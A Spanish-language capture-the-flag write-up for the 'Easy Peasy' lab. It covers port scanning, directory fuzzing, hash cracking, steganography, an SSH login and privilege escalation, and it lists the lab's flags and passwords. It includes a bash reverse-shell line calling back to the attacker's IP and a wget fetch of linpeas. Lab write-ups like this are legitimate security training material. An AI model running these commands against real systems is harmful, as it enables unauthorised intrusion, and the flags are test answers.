# Easy Peasy

Nmap

alt text

Puertos abiertos

alt text

Web

Puerto 80

alt text

Robots.txt

alt text

Versión nginx

alt text

Puerto 65524

alt text

Fuzzing

gobuster dir -u http://10.10.44.195/ -w Desktop/common.txt -x php
alt text alt text alt text alt text alt text alt text
flag{f1rs7_fl4g}
alt text alt text

Para crackear el hash lo introducimos en la siguiente web md5hashing

flag{1m_s3c0nd_fl4g}
alt text

Encontramos la tercera flag en la misma web de apache

alt text

Encontramos un codigo cifrado en base62, hace referencia a la ruta escondida "/n0th1ng3ls3m4tt3r"

alt text alt text

En el código fuente encontramos un hash

alt text

Usamos "hash-identifier", para ver posibles cifrados

alt text

Use los posibles cifrados pero no lo encontré, por lo que use john y el diccionario de contraseñas "easypeasy.txt"

alt text alt text
mypasswordforthatjob

Descargamos la imagen de la web, comprobamos si tiene algun texto escondido

steghide extract -sf binarycodepixabay.jpg

Nos pide una contraseña, usamos la que acabamos de conseguir

alt text alt text
iconvertedmypasswordtobinary

SSH

ssh -p 6498 boring@10.10.254.187
alt text

Encontramos un ``user.txt`` con la flag ¿rotada?

alt text

Usamos rot13

flag{n0wits33msn0rm4l}
alt text

Escalada de privilegios

Iniciamos un servidor para subir ``linpeas``

python3 -m http.server 1234
alt text

Lo descargamos en la máquina atacada

wget 10.8.67.209:1234/linpeas.sh
alt text

Lo ejecutamos

chmod +x linpeas.sh
./linpeas.sh
alt text

Creamos una shell en el archivo

bash -i >& /dev/tcp/10.8.67.209/8080 0>&1
alt text

Ponemos el puerto en escucha, ya tendremos acceso ``root``

alt text

Buscamos ``root.txt``

alt text